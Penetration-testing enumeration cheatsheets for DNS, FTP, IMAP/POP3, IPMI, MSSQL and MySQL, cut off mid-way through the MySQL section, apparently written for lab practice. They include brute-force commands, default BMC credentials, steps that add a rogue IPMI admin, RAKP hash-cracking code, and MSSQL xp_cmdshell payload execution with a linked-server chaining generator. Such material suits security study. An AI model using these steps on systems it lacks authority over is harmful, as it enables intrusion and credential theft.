DNS

DNS Enumeration Cheatsheet

Default port: 53 (UDP for ordinary queries; TCP for zone transfers and any answer too large for a UDP datagram)

Key DNS Record Types

| Record | Description |
| --- | --- |
| A | IPv4 address |
| AAAA | IPv6 address |
| MX | Mail server |
| NS | Name server |
| TXT | Text records (SPF, DMARC, domain-verification tokens) |
| CNAME | Canonical name / alias |
| SOA | Start of authority (primary NS, admin mailbox, zone serial) |
| PTR | Reverse lookup |
| SRV | Service location (host and port for a named service) |

Basic Lookups

```bash
# host
host <domain>
host -t A <domain>
host -t MX <domain>
host -t NS <domain>
host -t TXT <domain>
host -t CNAME <domain>

# dig
dig <domain>
dig <domain> ANY        # many servers answer ANY with a minimal reply (RFC 8482); query the types individually if this comes back thin
dig <domain> A
dig <domain> MX
dig <domain> NS
dig <domain> TXT
dig @<nameserver> <domain> ANY +noall +answer   # ask the authoritative server directly, print the answer section only

# nslookup
nslookup <domain>
nslookup -type=MX <domain>
nslookup -type=NS <domain>
```

Zone Transfer

Try every name server returned by `host -t NS <domain>`: a secondary is often left open while the primary refuses. A successful AXFR returns the whole zone, including internal hostnames, and is a misconfiguration finding in itself.

```bash
dig axfr @<nameserver> <domain>
host -l <domain> <nameserver>
fierce --domain <domain>          # also attempts AXFR against each NS it discovers
```

Subdomain Enumeration

```bash
# dnsenum
dnsenum --dnsserver <ns> --enum -p 0 -s 0 -o output.txt -f wordlist.txt <domain>
dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r

# dnsrecon
dnsrecon -d <domain> -t std                     # Standard enumeration (SOA, NS, MX, A, AAAA, SRV, TXT)
dnsrecon -d <domain> -t axfr                    # Zone transfer attempt against every NS
dnsrecon -d <domain> -t brt -D wordlist.txt     # Brute force subdomains

# gobuster DNS mode
gobuster dns -d <domain> -w wordlist.txt -r <nameserver>

# Sublist3r (passive: search engines and public sources)
sublist3r -d <domain>

# Amass
amass enum -d <domain>
amass enum -passive -d <domain>    # no queries sent to the target's own servers
```

Nmap DNS Scripts

```bash
nmap -p 53 --script dns-brute <domain>
nmap -p 53 --script dns-zone-transfer \
     --script-args dns-zone-transfer.domain=<domain> <nameserver>
nmap -p 53 --script dns-nsid <nameserver>          # Server identity (NSID, version.bind)
nmap -p 53 --script dns-recursion <nameserver>     # Open recursive resolver (amplification / cache poisoning surface)
nmap -p 53 --script dns-cache-snoop <nameserver>   # Which names the resolver has cached (who the org talks to)
```

Reverse DNS Lookup

```bash
dig -x <ip>
host <ip>
dnsrecon -r <cidr> -t rvl    # Reverse lookup of an entire range

# Example
dig -x 192.168.1.1
host 192.168.1.1
```

Wordlists (SecLists)

/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt
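What to do with a zone transfer once it succeeds: the commands above dump the zone, but the value is in triaging it (which record types exist, which hostnames to feed into further enumeration, and which A records point into private address space and should never have been published). The following is an added example, not code from the original cheatsheet: it parses the answer section of `dig axfr` output and groups and flags the records. The zone data is constructed for the example (the domain name inlanefreight.htb is the one the cheatsheet uses; every address and hostname in it is made up), and it uses only the Python standard library.

```python
"""Triage of `dig axfr` output: parse records, list hostnames, flag internal A records."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample of what `dig axfr @<ns> inlanefreight.htb` prints.
# Answer lines are whitespace-separated: name TTL class type rdata.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1 <<>> axfr @10.129.14.128 inlanefreight.htb
;; global options: +cmd
inlanefreight.htb.      604800  IN  SOA  ns.inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN  TXT  "v=spf1 include:mailgun.org ~all"
inlanefreight.htb.      604800  IN  NS   ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN  A    10.129.18.15
internal.inlanefreight.htb. 604800 IN A  10.129.1.6
ns.inlanefreight.htb.   604800  IN  A    10.129.34.136
www.inlanefreight.htb.  604800  IN  CNAME app.inlanefreight.htb.
mail1.inlanefreight.htb. 604800 IN  A    203.0.113.10
inlanefreight.htb.      604800  IN  SOA  ns.inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 4 msec
"""

RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")

# RFC 1918 space; ipaddress.is_private would also flag documentation ranges such
# as 203.0.113.0/24, which is not what "internal" means here.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_axfr(text):
    """Return (name, ttl, type, rdata) tuples. A transfer starts and ends with
    the SOA, so the second copy is dropped."""
    records = []
    seen_soa = False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if not m:
            continue
        name, ttl, rtype, rdata = m.group(1).rstrip("."), int(m.group(2)), m.group(3), m.group(4).strip()
        if rtype == "SOA":
            if seen_soa:
                continue
            seen_soa = True
        records.append((name, ttl, rtype, rdata))
    return records


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918) or addr.is_loopback or addr.is_link_local


def triage(records):
    """Group records by type and list A records that resolve to internal space."""
    by_type = defaultdict(list)
    internal_hosts = []
    for name, _ttl, rtype, rdata in records:
        by_type[rtype].append((name, rdata))
        if rtype == "A" and is_internal(rdata):
            internal_hosts.append((name, rdata))
    return {"by_type": dict(by_type), "internal_hosts": internal_hosts}


def hostnames(records):
    """Unique names in the zone: a seed list for vhost brute force and reverse lookups."""
    return sorted({name for name, _, _, _ in records})


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    for rtype, entries in triage(recs)["by_type"].items():
        print(rtype, entries)
    print("internal:", triage(recs)["internal_hosts"])
    print("hosts:", hostnames(recs))
```

Run it against real output by replacing SAMPLE_AXFR with the captured text; the regex only needs the `name TTL IN TYPE rdata` layout dig prints by default.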

2 min · d3vilsec

FTP

FTP Enumeration Cheatsheet

Default ports: 21 (control), 20 (server-side data port in active mode; passive mode uses a high port the server announces)

Banner Grabbing & Connection

```bash
nc -nv <ip> 21
telnet <ip> 21
ftp <ip>
openssl s_client -connect <ip>:21 -starttls ftp   # explicit FTPS (AUTH TLS); implicit FTPS on 990 needs no -starttls
```

Anonymous Login

```bash
ftp <ip>
# Username: anonymous
# Password: anonymous (or leave blank; some servers expect an e-mail address)

# Via curl
curl -v ftp://<ip>/ --user anonymous:anonymous
curl -v ftp://<ip>/<path>/ --user anonymous:anonymous
```

FTP Commands (Once Connected)

Raw protocol verbs, usable from nc/telnet on the control channel. LIST, NLST, RETR and STOR transfer over a separate data connection, so send PASV first and connect to the port it announces (p1*256 + p2) before issuing them.

```
USER <username>     # Send username
PASS <password>     # Send password
SYST                # Display system type
STAT                # Status / verbose file listing (over the control channel, no data connection needed)
LIST                # List files (verbose)
NLST                # Name list (simple)
PWD                 # Print working directory
CWD <dir>           # Change directory
RETR <file>         # Download file
STOR <file>         # Upload file
TYPE I              # Binary transfer mode
TYPE A              # ASCII transfer mode
PASV                # Enter passive mode
QUIT                # Disconnect
```

The same operations in the `ftp` client, which handles the data connection for you:

```
get <file>          # Download file (RETR)
put <file>          # Upload file (STOR)
mget *              # Download all files (run "prompt" first to skip per-file confirmation)
binary / ascii      # TYPE I / TYPE A
passive             # Toggle passive mode
```

Nmap FTP Scripts

```bash
nmap -p 21 --script ftp-anon <ip>               # Check anonymous login
nmap -p 21 --script banner <ip>                 # Banner grab (generic banner script)
nmap -p 21 --script ftp-brute <ip>              # Brute force credentials
nmap -p 21 --script ftp-bounce <ip>             # FTP bounce attack check (PORT to a third host)
nmap -p 21 --script ftp-syst <ip>               # SYST command response
nmap -p 21 --script ftp-vsftpd-backdoor <ip>    # vsFTPd 2.3.4 backdoor check
nmap -p 21 -sV --script ftp-* <ip>              # Run all FTP scripts (includes ftp-brute; expect noise and possible lockouts)
```

Brute Force

```bash
hydra -l <user> -P wordlist.txt ftp://<ip>
hydra -L users.txt -P wordlist.txt ftp://<ip>
medusa -u <user> -P wordlist.txt -h <ip> -M ftp
```

Bulk Download

```bash
# wget recursive download in active mode (drop --no-passive-ftp if a firewall blocks the inbound data connection)
wget -m --no-passive-ftp ftp://anonymous:anonymous@<ip>

# curl: list, then fetch each entry (flat directories only; the last field of each listing line is the name)
curl -s ftp://<ip>/ --user anonymous:anonymous | awk '{print $NF}' | \
  while read f; do curl -s ftp://<ip>/$f --user anonymous:anonymous -O; done
```

Key Vulnerabilities

| Software | CVE | Description |
| --- | --- | --- |
| vsFTPd 2.3.4 | CVE-2011-2523 | Backdoored release: a username containing `:)` opens a root shell on port 6200 |
| ProFTPD 1.3.5 | CVE-2015-3306 | mod_copy SITE CPFR/CPTO: unauthenticated file copy (write a web shell from an uploadable path) |
| ProFTPD < 1.3.3c | CVE-2010-4221 | Stack-based buffer overflow in Telnet IAC handling (pr_netio_telnet_gets), remote code execution; fixed in 1.3.3c |
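The anonymous-login check and the PASV dance from the command list, done over the raw protocol. This is an added example, not code from the original cheatsheet: it implements the control-channel exchange (banner, USER/PASS, SYST, QUIT), handles multi-line replies, and parses a `227` PASV reply into the host and port a raw client would have to connect to for LIST or RETR. So that it runs offline, it talks to a tiny fake FTP server started in a thread on 127.0.0.1; that server's banner and replies are constructed for the example and stand in for a real target.

```python
"""Raw-protocol FTP anonymous-login probe with PASV parsing (offline demo via a fake server)."""
import re
import socket
import threading

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_pasv(reply):
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> (host, port). Port is p1*256 + p2."""
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError("not a PASV reply: %r" % reply)
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


class _Conn:
    """Minimal line-oriented FTP control channel."""
    def __init__(self, host, port, timeout=5):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.f = self.sock.makefile("rb")

    def reply(self):
        # Multi-line replies look like "ccc-text ... ccc text": read until the final "ccc " line.
        line = self.f.readline().decode(errors="replace").rstrip("\r\n")
        code, lines = line[:3], [line]
        if len(line) > 3 and line[3] == "-":
            while not line.startswith(code + " "):
                line = self.f.readline().decode(errors="replace").rstrip("\r\n")
                lines.append(line)
        return code, "\n".join(lines)

    def cmd(self, text):
        self.sock.sendall((text + "\r\n").encode())
        return self.reply()

    def close(self):
        try:
            self.cmd("QUIT")
        finally:
            self.sock.close()


def ftp_anon_check(host, port=21):
    """Return (banner, anonymous_ok, syst). 230 after PASS means anonymous access is on,
    530 means it is refused. SYST is asked because the banner is often blanked while
    SYST still names the OS family."""
    c = _Conn(host, port)
    _, banner = c.reply()
    code, _ = c.cmd("USER anonymous")
    if code == "331":
        code, _ = c.cmd("PASS anonymous@example.com")
    anonymous_ok = code == "230"
    syst = c.cmd("SYST")[1] if anonymous_ok else ""
    c.close()
    return banner, anonymous_ok, syst


# --- fake server, only so the example runs offline (replies are constructed) ---
def _fake_ftp_server(allow_anonymous):
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        f = conn.makefile("rb")
        conn.sendall(b"220 (vsFTPd 3.0.3)\r\n")
        while True:
            parts = f.readline().split()
            verb = parts[0].upper() if parts else b""
            if verb == b"USER":
                conn.sendall(b"331 Please specify the password.\r\n")
            elif verb == b"PASS":
                conn.sendall(b"230 Login successful.\r\n" if allow_anonymous else b"530 Login incorrect.\r\n")
            elif verb == b"SYST":
                conn.sendall(b"215 UNIX Type: L8\r\n")
            elif verb == b"QUIT":
                conn.sendall(b"221 Goodbye.\r\n")
                break
            elif verb == b"":
                break
            else:
                conn.sendall(b"502 Command not implemented.\r\n")
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo(allow_anonymous=True):
    """Start the fake server and probe it; returns what ftp_anon_check returns."""
    return ftp_anon_check("127.0.0.1", _fake_ftp_server(allow_anonymous))


if __name__ == "__main__":
    print(demo(True))
    print(demo(False))
    print(parse_pasv("227 Entering Passive Mode (10,0,0,5,195,80)"))
```

Against a real host call `ftp_anon_check("<ip>")` directly; the fake server exists only for the offline demo.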

2 min · d3vilsec

IMAP POP3

IMAP / POP3 Enumeration Cheatsheet

Default ports: IMAP 143 (plain, STARTTLS optional) and 993 (implicit TLS); POP3 110 (plain, STLS optional) and 995 (implicit TLS)

Banner Grabbing

```bash
nc -nv <ip> 110                                    # POP3
nc -nv <ip> 143                                    # IMAP
openssl s_client -connect <ip>:993                 # IMAPS
openssl s_client -connect <ip>:995                 # POP3S
openssl s_client -connect <ip>:143 -starttls imap  # STARTTLS IMAP
```

POP3 Commands (Manual)

```
USER <username>
PASS <password>
STAT                # Mailbox stats (message count, total size)
LIST                # List all messages with sizes
LIST <n>            # Info for message n
RETR <n>            # Retrieve (download) message n
DELE <n>            # Mark message n for deletion
TOP <n> <lines>     # Headers plus the first <lines> lines of message n
UIDL                # Unique ID listing for all messages
NOOP                # Keep-alive
RSET                # Unmark any deletions
QUIT                # Commit deletes and disconnect (nothing is deleted until QUIT)
```

IMAP Commands (Manual)

Every IMAP command is prefixed with a client-chosen tag (`a` below); the server echoes it on the final OK/NO/BAD line.

```
a LOGIN <user> <pass>
a CAPABILITY                        # Show server capabilities (LOGINDISABLED here means LOGIN is refused until STARTTLS)
a LIST "" "*"                       # List all mailboxes
a SELECT INBOX                      # Select inbox
a STATUS INBOX (MESSAGES UNSEEN)    # Inbox stats
a FETCH 1:* (FLAGS)                 # List messages with flags
a FETCH 1 (BODY[])                  # Download full message 1 (sets \Seen; use BODY.PEEK[] to avoid that)
a FETCH 1 (BODY[HEADER])            # Headers only
a FETCH 1 (BODY[TEXT])              # Body only
a SEARCH ALL                        # Search all messages
a SEARCH UNSEEN                     # Search unread messages
a EXAMINE INBOX                     # Read-only select
a LOGOUT
```

Nmap Scripts

```bash
nmap -p 143,993 --script imap-capabilities <ip>
nmap -p 110,995 --script pop3-capabilities <ip>
nmap -p 110 --script pop3-brute <ip>
nmap -p 143 --script imap-brute <ip>
nmap -p 143,993 --script imap-ntlm-info <ip>    # Windows host/domain leak via NTLM challenge
nmap -p 110,995 --script pop3-ntlm-info <ip>    # same for POP3
```

Brute Force

```bash
hydra -l <user> -P wordlist.txt imap://<ip>
hydra -l <user> -P wordlist.txt pop3://<ip>
hydra -l <user> -P wordlist.txt -s 993 -S imap://<ip>   # IMAPS
hydra -l <user> -P wordlist.txt -s 995 -S pop3://<ip>   # POP3S
```

curl Mail Access

`-k` skips certificate validation, which is usually needed against self-signed lab certificates.

```bash
# List mailboxes
curl -k 'imaps://<ip>' --user <user>:<pass>

# List INBOX contents
curl -k 'imaps://<ip>/INBOX' --user <user>:<pass>

# Read specific message
curl -k 'imaps://<ip>/INBOX;MAILINDEX=1' --user <user>:<pass>

# POP3 via curl
curl -k 'pop3s://<ip>' --user <user>:<pass>      # List messages
curl -k 'pop3s://<ip>/1' --user <user>:<pass>    # Download message 1
```
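The first thing the CAPABILITY and CAPA replies above tell you is whether the port accepts a password in the clear and whether STARTTLS/STLS is even offered; that decides whether the brute-force and curl commands should go to 143/110 or only to 993/995. This is an added example, not from the original cheatsheet: two small parsers for the replies and the judgement a tester makes from them. Both replies are constructed for the example.

```python
"""Triage of IMAP CAPABILITY and POP3 CAPA replies: cleartext login, STARTTLS, SASL mechanisms."""

# Constructed reply to "a CAPABILITY" on port 143, before STARTTLS.
IMAP_REPLY = (
    "* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE "
    "STARTTLS AUTH=PLAIN AUTH=LOGIN\r\n"
    "a OK Pre-login capabilities listed, post-login capabilities have more.\r\n"
)

# Constructed reply to "CAPA" on port 110: STLS offered, but USER/PASS still accepted.
POP3_REPLY = ("+OK\r\nCAPA\r\nTOP\r\nUIDL\r\nRESP-CODES\r\nPIPELINING\r\n"
              "STLS\r\nUSER\r\nSASL PLAIN\r\n.\r\n")


def parse_imap_capabilities(reply):
    """Tokens of the untagged '* CAPABILITY' line."""
    for line in reply.splitlines():
        if line.upper().startswith("* CAPABILITY"):
            return set(line.split()[2:])
    raise ValueError("no CAPABILITY line in reply")


def parse_pop3_capabilities(reply):
    """Capability names from a CAPA reply: one per line after +OK, ended by a lone '.'.
    Lines with arguments ('SASL PLAIN') are kept whole."""
    lines = reply.splitlines()
    if not lines or not lines[0].startswith("+OK"):
        raise ValueError("CAPA not supported or refused")
    caps = set()
    for line in lines[1:]:
        if line == ".":
            break
        caps.add(line.strip().upper())
    return caps


def assess_imap(caps, over_tls=False):
    """LOGINDISABLED means LOGIN is refused until TLS is up; without it on a plain
    port the password crosses the wire in the clear."""
    caps = {c.upper() for c in caps}
    return {
        "starttls": "STARTTLS" in caps,
        "plaintext_login_allowed": not over_tls and "LOGINDISABLED" not in caps,
        "sasl_mechanisms": sorted(c[5:] for c in caps if c.startswith("AUTH=")),
    }


def assess_pop3(caps, over_tls=False):
    """USER in CAPA means USER/PASS is accepted on this port."""
    caps = {c.upper() for c in caps}
    sasl = set()
    for c in caps:
        if c.startswith("SASL "):
            sasl.update(c.split()[1:])
    return {
        "starttls": "STLS" in caps,
        "plaintext_login_allowed": not over_tls and "USER" in caps,
        "sasl_mechanisms": sorted(sasl),
    }


if __name__ == "__main__":
    print(assess_imap(parse_imap_capabilities(IMAP_REPLY)))
    print(assess_pop3(parse_pop3_capabilities(POP3_REPLY)))
```

Paste the reply captured with nc or openssl s_client into the two constants to assess a real server; pass `over_tls=True` when the capture came from 993/995 or after STARTTLS.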

2 min · d3vilsec

IPMI

IPMI Enumeration Cheatsheet

Default port: 623 (UDP)

What is IPMI?

Intelligent Platform Management Interface: out-of-band server management implemented by the baseboard management controller (Dell iDRAC, HP iLO, Supermicro IPMI and similar). It provides power control, serial/KVM console and often virtual media independently of the host OS, so control of the BMC is control of the machine even when the OS is down or reinstalled.

Detection & Version

```bash
nmap -sU -p 623 <ip>
nmap -sU -p 623 --script ipmi-version <ip>
```

Nmap Scripts

```bash
nmap -sU -p 623 --script ipmi-version <ip>
nmap -sU -p 623 --script ipmi-cipher-zero <ip>   # Check for cipher suite 0 authentication bypass
```

Metasploit Modules

```
# Version detection
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS <ip>
run

# Dump RAKP hashes (no password needed; only a valid username, tried from a built-in list)
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS <ip>
run

# Cipher 0 auth bypass (unauthenticated admin access)
use auxiliary/scanner/ipmi/ipmi_cipher_zero
set RHOSTS <ip>
run
```

ipmitool (Direct Interaction)

admin/admin below is a placeholder for working credentials. If cipher suite 0 is enabled, add `-C 0`: the BMC then accepts any password for a valid username.

```bash
# Version/status
ipmitool -I lanplus -H <ip> -U admin -P admin chassis status

# List users
ipmitool -I lanplus -H <ip> -U admin -P admin user list

# LAN config
ipmitool -I lanplus -H <ip> -U admin -P admin lan print

# Power control
ipmitool -I lanplus -H <ip> -U admin -P admin power status
ipmitool -I lanplus -H <ip> -U admin -P admin power reset

# Add user (post-compromise; user ID 4 is assumed free, check "user list" first)
ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker
ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1
ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4        # 4 = ADMINISTRATOR
ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4
```

Hash Cracking (After RAKP Dump)

```bash
# hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 (input is the salt:hash line the dump module prints)
hashcat -m 7300 hashes.txt wordlist.txt
hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule
```

Default Credentials

| Vendor / Interface | Username | Default Password |
| --- | --- | --- |
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | printed on the pull tab / chassis label |
| Supermicro IPMI | ADMIN | ADMIN |
| IBM IMM | USERID | PASSW0RD (zero, not O) |
| Cisco CIMC | admin | password |
| Intel RMM | admin | (blank) |

Key Vulnerabilities

| Issue | Description |
| --- | --- |
| Cipher suite 0 | "No authentication" cipher suite: the BMC accepts any password for a valid username, giving administrator access without a bypass exploit |
| RAKP hash disclosure | RAKP message 2 returns an HMAC keyed with the user's password before the client has proven anything, so anyone who knows or guesses a username gets a salted hash to crack offline; this is part of the IPMI 2.0 spec, not a bug to patch |
| Default credentials | Most BMCs ship with documented defaults (table above) that are rarely changed |
| Anonymous auth | Some BMCs enable an anonymous user (empty username and password) |
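Why the RAKP dump cracks offline, shown in code. This is an added example, not code from the original cheatsheet or from the Metasploit module: it computes the RAKP message 2 authentication code the way the IPMI 2.0 spec defines it (HMAC-SHA1 keyed with the user's password over SIDm || SIDc || Rm || Rc || GUIDc || Role || ULen || UName, everything but the password visible on the wire), writes it out in the salt:hash layout that hashcat mode 7300 takes, and cracks it with a short wordlist. The session IDs, nonces and GUID are random stand-ins for values a real exchange would produce; the username and passwords are the defaults from the table above.

```python
"""IPMI 2.0 RAKP2 authentication code: build a salt:hash line and crack it offline."""
import hashlib
import hmac
import os

ROLE_ADMIN_NAMEONLY = 0x14   # ADMINISTRATOR (0x04) with the name-only-lookup bit, as the dump module requests


def rakp2_auth_code(password, sid_m, sid_c, rand_m, sid_rand_c, guid_c, role, username):
    """(data, hmac) for RAKP message 2. The key is the user's password; IPMI stores
    passwords as up to 20 bytes, so longer keys are truncated (HMAC zero-pads shorter ones)."""
    data = (sid_m + sid_c + rand_m + sid_rand_c + guid_c
            + bytes([role]) + bytes([len(username)]) + username.encode())
    key = password.encode()[:20]
    return data, hmac.new(key, data, hashlib.sha1).digest()


def build_dump_line(password, username="admin"):
    """What a RAKP dump yields for one user: 'salt:hash' where the salt is the data
    above (all observable) and the hash is the BMC's reply. Session values are random."""
    sid_m, sid_c = os.urandom(4), os.urandom(4)
    rand_m, rand_c, guid_c = os.urandom(16), os.urandom(16), os.urandom(16)
    data, code = rakp2_auth_code(password, sid_m, sid_c, rand_m, rand_c, guid_c,
                                 ROLE_ADMIN_NAMEONLY, username)
    return "%s:%s" % (data.hex(), code.hex())


def username_from_salt(salt_hex):
    """The username is the last field of the salt: 58 fixed bytes, then a length byte, then the name."""
    salt = bytes.fromhex(salt_hex)
    ulen = salt[57]
    return salt[58:58 + ulen].decode()


def crack(salt_hex, hash_hex, wordlist):
    """Offline guess loop; each candidate costs one HMAC-SHA1, which is why defaults fall instantly."""
    salt, target = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode()[:20], salt, hashlib.sha1).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


if __name__ == "__main__":
    line = build_dump_line("calvin", username="root")
    salt_hex, hash_hex = line.split(":")
    print(line)
    print("user:", username_from_salt(salt_hex))
    print("cracked:", crack(salt_hex, hash_hex, ["admin", "ADMIN", "password", "calvin"]))
```

The point of `username_from_salt` is that the "salt" is not secret at all: it is the session material plus the username, which is exactly why a wordlist of vendor defaults against a handful of usernames usually succeeds in seconds.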

2 min · d3vilsec

MSSQL

MSSQL Enumeration Cheatsheet

Default ports: 1433 (TCP, default instance); 1434 (UDP, SQL Server Browser, which reveals the dynamic TCP ports of named instances)

Discovery & Nmap Scripts

```bash
nmap -p 1433 --script ms-sql-info <ip>              # Version, instance names, named pipes (also queries the Browser service)
nmap -p 1433 --script ms-sql-config <ip>            # Needs valid credentials
nmap -p 1433 --script ms-sql-empty-password <ip>
nmap -p 1433 --script ms-sql-brute <ip>
nmap -sU -p 1434 --script ms-sql-dac <ip>           # Ask the Browser service for each instance's Dedicated Admin Connection port
nmap -p 1433 --script ms-sql-* <ip>                 # All MSSQL scripts
```

Metasploit Modules

```
use auxiliary/scanner/mssql/mssql_ping             # Discovery + version (via UDP 1434)
use auxiliary/scanner/mssql/mssql_login            # Brute force auth
use auxiliary/admin/mssql/mssql_sql                # Execute SQL query
use auxiliary/admin/mssql/mssql_exec               # OS command execution (xp_cmdshell)
use auxiliary/admin/mssql/mssql_enum               # Full enumeration
use auxiliary/admin/mssql/mssql_enum_sql_logins    # Enumerate SQL logins
```

mssqlclient.py (impacket)

```bash
# Connect with SQL auth
python3 mssqlclient.py <user>:<pass>@<ip>

# Connect with Windows auth
python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth

# Connect with hash (Pass-the-Hash)
python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth
```

Useful SQL Queries

```sql
-- Version and user info
SELECT @@version;
SELECT system_user;      -- login
SELECT user_name();      -- database user
SELECT DB_NAME();

-- Check if sysadmin (1 = yes)
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');

-- List databases
SELECT name FROM sys.databases;
USE <database>;
SELECT table_name FROM information_schema.tables;

-- List users and roles
SELECT name, type_desc FROM sys.server_principals;
SELECT name FROM sys.syslogins;
SELECT roles.name
FROM sys.server_role_members AS srm
JOIN sys.server_principals AS roles   ON roles.principal_id   = srm.role_principal_id
JOIN sys.server_principals AS members ON members.principal_id = srm.member_principal_id
WHERE members.name = '<user>';
```

xp_cmdshell (OS Command Execution)

Enabling it requires sysadmin (or ALTER SETTINGS); commands run as the SQL Server service account.

```sql
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'powershell -enc <base64payload>';
```

Linked Servers (Lateral Movement)

Queries sent through a link run as whatever login the link was configured with on the remote side (frequently sa), so a low-privilege login here can be sysadmin there. `EXECUTE ... AT` requires the link's "rpc out" option; if it is disabled, OPENQUERY([<linked_server>], '...') still runs SELECTs. Every single quote inside the executed string must be doubled, once per hop.

```sql
-- Enumerate linked servers
SELECT * FROM sys.servers;
EXEC sp_linkedservers;

-- Execute query on linked server
EXECUTE('SELECT @@version') AT [<linked_server>];
EXECUTE('SELECT system_user') AT [<linked_server>];

-- Execute OS command via linked server (xp_cmdshell must be enabled on the remote side)
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>];
```

Brute Force

```bash
hydra -l sa -P wordlist.txt mssql://<ip>
medusa -h <ip> -u sa -P wordlist.txt -M mssql
crackmapexec mssql <ip> -u <user> -p wordlist.txt
```

File Read / Write

```sql
-- Read file (OPENROWSET BULK needs the ADMINISTER BULK OPERATIONS permission; sysadmin has it)
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t;

-- Write file (via xp_cmdshell, as the service account)
EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';
```
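The quoting in the linked-server section is where chained execution usually goes wrong by hand: each `EXECUTE('...') AT [server]` hop wraps the previous statement in another string literal, so every single quote must be doubled again per hop, and a two-hop xp_cmdshell ends up with six quotes after the argument. This is an added example, not code from the original cheatsheet: a small generator that produces correctly escaped multi-hop statements, including the sp_configure steps needed to turn xp_cmdshell on at the far end. Server names SQL01 and SQL02 are placeholders.

```python
"""Generate correctly quoted multi-hop EXECUTE ... AT statements for MSSQL linked servers."""


def sql_literal(text):
    """Embed text in a T-SQL string literal: single quotes are doubled."""
    return "'" + text.replace("'", "''") + "'"


def bracket_name(name):
    """Quote an identifier with []; a literal ] inside is doubled."""
    return "[" + name.replace("]", "]]") + "]"


def linked_exec(chain, statement):
    """Wrap statement so it runs on the last server of chain, hopping through the
    earlier ones. chain=["SQL01", "SQL02"]: this server EXECUTEs AT SQL01, which
    EXECUTEs AT SQL02. Built inside-out so each hop escapes the one below it."""
    query = statement
    for server in reversed(chain):
        query = "EXECUTE(%s) AT %s" % (sql_literal(query), bracket_name(server))
    return query


def enable_xp_cmdshell(chain):
    """The sp_configure calls must also travel through the chain; each is its own batch."""
    steps = [
        "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;",
        "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    ]
    return [linked_exec(chain, s) for s in steps]


def xp_cmdshell(chain, command):
    """Run an OS command on the last server in the chain."""
    return linked_exec(chain, "EXEC xp_cmdshell %s" % sql_literal(command))


if __name__ == "__main__":
    print(linked_exec(["SQL01"], "SELECT @@version"))
    print(xp_cmdshell(["SQL01", "SQL02"], "whoami"))
    for q in enable_xp_cmdshell(["SQL01", "SQL02"]):
        print(q)
```

Paste the printed statements into mssqlclient.py one batch at a time; if the remote link refuses with an RPC error, "rpc out" is off on that link and the enabling step has to be done by someone with ALTER on the linked server definition (`EXEC sp_serveroption '<linked_server>', 'rpc out', 'true'`).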

2 min · d3vilsec

MySQL

MySQL Enumeration Cheatsheet

Default port: 3306 (TCP)

Connection & Banner Grabbing

```bash
nc -nv <ip> 3306                                   # Banner grab (version string in the server greeting)
mysql -u root -h <ip>                              # No password
mysql -u root -p -h <ip>                           # Prompt for password
mysql -u root -p<password> -h <ip>                 # Inline password (no space; lands in shell history and ps output)
mysql -u root -h <ip> -e "SELECT version();"       # One-liner query
```

Nmap Scripts

```bash
nmap -p 3306 --script mysql-info <ip>
nmap -p 3306 --script mysql-databases \
     --script-args mysqluser=root,mysqlpass='' <ip>
nmap -p 3306 --script mysql-empty-password <ip>
nmap -p 3306 --script mysql-brute <ip>
nmap -p 3306 --script mysql-audit <ip>               # Config audit, needs credentials
